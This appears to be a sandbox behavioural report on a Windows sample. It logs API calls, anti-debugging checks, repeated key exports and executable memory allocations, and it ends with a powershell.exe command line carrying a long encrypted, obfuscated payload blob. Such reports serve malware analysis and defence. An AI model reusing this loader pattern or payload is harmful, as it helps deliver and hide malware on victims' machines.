Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: The term 'Method' is not recognized as the name of a cmdlet, function, script f
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: ile, or operable program. Check the spelling of the name, or if a path was incl
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: uded, verify that the path is correct and try again.
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: At line:1 char:7
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + Method <<<< invocation failed because [System.Security.Cryptography.AesManag
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: ed] does
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (Method:String) [], CommandNotFo
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: undException
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: Bad numeric constant: 4D.
console_handle: 0x00000427
1 1 0

WriteConsoleW

 buffer: At line:4 char:3
console_handle: 0x00000433
1 1 0

WriteConsoleW

 buffer: + 4D <<<< Z/1WJXt3kVTfJMRSw/0Agv4WTgUnimICmwI1mp0XAg3wV1l/Nk/XEYdFNqy9etUj0KCfD
console_handle: 0x0000043f
1 1 0

WriteConsoleW

 buffer: Tb9mf+9d
console_handle: 0x0000044b
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ParserError: (4D:String) [], ParentContainsError
console_handle: 0x00000457
1 1 0

WriteConsoleW

 buffer: RecordException
console_handle: 0x00000463
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : BadNumericConstant
console_handle: 0x0000046f
1 1 0

WriteConsoleW

 buffer: Bad numeric constant: 4D.
console_handle: 0x00000813
1 1 0

WriteConsoleW

 buffer: At line:5 char:3
console_handle: 0x0000081f
1 1 0

WriteConsoleW

 buffer: + 4D <<<< Z/1WJXt3kVTfJMRSw/0Agv4WTgUnimICmwI1mp0XAg3wV1l/Nk/XEYdFNqy9etUj0KCfD
console_handle: 0x0000082b
1 1 0

WriteConsoleW

 buffer: Tb9mf+9d
console_handle: 0x00000837
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ParserError: (4D:String) [], ParentContainsError
console_handle: 0x00000843
1 1 0

WriteConsoleW

 buffer: RecordException
console_handle: 0x0000084f
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : BadNumericConstant
console_handle: 0x0000085b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9580
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9b00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9b00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9b00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9d00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9d00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9d00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9d00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9d00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9d00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9540
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9540
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9540
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9b00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9b00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9b00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9b00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9b00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9b00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9b00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9b00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9b00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9b00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9dc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e9dc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00468610
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00469010
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00469010
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00469010
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004686d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004686d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004686d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004686d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004686d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004686d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 262144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025f0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x717e1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x717e2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02662000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02672000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02673000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02674000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02692000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02675000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02970000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02676000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02693000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02694000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02695000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02696000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02697000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02698000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02699000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04cb0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04cb1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04cb2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04cb3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04cb4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04cb5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04cb6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04cb7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04cb8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04cb9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04cba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04cbb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04cbc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04cbd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04cbe000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04cbf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04cc0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04cc1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04cc2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04cc3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell.exe $ITufmtMLHgVEL = 'AAAAAAAAAAAAAAAAAAAAADtnvX24mEK2hW8RbbL5X2KHm316RWatxcX3+7v4DZ/1WJXt3kVTfJMRSw/0Agv4WTgUnimICmwI1mp0XAg3wV1l/Nk/XEYdFNqy9etUj0KCfDTb9mf+9dmTWXKBqKtAB2lsN94OdJfyfwHNVl5YS8RKarUl1Fa92CUiZ50GLCwbh6h8+EZjgaGgrfnQhHaWcqL5afH+yxSykwgw3Izrd2g/ylvFlVtIKMkHCLf1+4Dcj/xQ5ogZ6x7gd8mDX36loJV53EpKf6h+YaaiNMufy/fNCnGeIREtR/cn+WGi4+4ixdaGBTiwo1Kgs7cGCgkkxZlr2cn71r0hDuQXImeUiAJmAnPDto4UJ/j+JzBmOR8MeP+aEnAxgXNZYkuwr3wjkdvGViUJBNQ5sqWDehTlvxASDUOjqVmo1Y13f5mZtAUhCbpebA95nGZbhQwnRMomhnNAMzaT11eK5942PK5bFEMQjY4VSZIAM7bocs1Ar1Jp7BkGk8KrYC5yAwWIG2DTeBIf/4HOFdNeMq7Q7cm/xdzQ2r2Ek/VpXZa0HkWNOV7zr+Gy/84f76/K8yC/ExryvPTCFuRMJOD+qeyWCTEYpsS/bLL9Ul1YIIgjoSwcjy/g0SyILOAqGlkx3/vd/Ty4K9gNxmFa+HAOS4EY2A7KRkyUxdLVqA+H0iVooSjzdnayWiArM+oMrukRZoOcwmZoHlt+4nn9HB60SXGPYMLePAwt/ZPprtnCRDidjEwkcSMxeBSWNBt8sTY/H7Jj0wM/ILKRwosFN2vrOI6SZbRjWDRbFzII3tIQ3xATLUz9u4zks9p5omogNO/y1f5BabsTnYH+m1yoX2Jber8Q64d3agsNov0p1wGN6A0FnMixd+G7JwbMZxLktrQ6PZifqI0bKrNhBnhFyUoq7wLZkD/mNidPkEJr/fsdBo2O5Eu/cOegjeWoTqwHz8pXQ/xiFcfn2t72629NwZjy5K6d8fK7zOs6w0Njj747xQp/d9HWnnpqnUOeLdXNNsEAhriP6pgziQPkG3y6SRYfa2a6RMHp7dmeEajl7H15HznbP3cTj/x9/vwQe1BnZFLgQQUGfSRhg8E1ucPuA29oU3rh5EqlfdOBFVKWWKMQCl9VEQ1pTHMXnOdrVHfY4zbj5n0c9If0mMsG2ZQfPLKYbeEjX/kyH++GJfXvjfyKJOAJqu6aNxK5XVqzgzjUCAnuZP8KdYLgsGS7TlLb+fSk/Xn/nPioV4FGgIKXJJhSNZTCVaxk9pbrF3oanii3et3L+uFov09w3An2THZTk51bsaupjHhNDnbi0YZ/uv1T2KnbRvLjUnHoaBdK7HI5NufgSm9CX0XTnifXfHdir3jNX3Pdun5yDOHm77hzqVpeOvbW3PwrB1bPSfA3R/3Xqn8TOgQonUjtmbbPnT92Lge0N7gSQM/rgWzVjZkPhLQ+3JjVLDgytJkziMMZhaCzuUg/w0He1NUVynSvkjm+6ZdvmKBZwt4zLhCAndi6OoP73GiZBq3KpUGvA7tRWDFwKGD4ljJv13CujWgL0BM5yULy6ZJ0jVuvJpALPauISoL/UCCH9BVUU1DYkCMvmwwIP278U39b41NFFpxnRyJ9ugKjsi82j7pjAT3nA9HH1diRLsmb9MzDWSMgxaKdV78OfbPMauMoA7+N2bYRd7cIvB4uFYEhldWgc1K6/aN35p8jexm6V0ju49Kjlo1Ym9jPhzgLlr8l6w1iPe7em8xpLTh1U7Wbv1Q9ayKusLDZL1OqI4YnvpHi7HXZKJytb2xPytAhixf7Hexmw6OxlPUv6a2vsi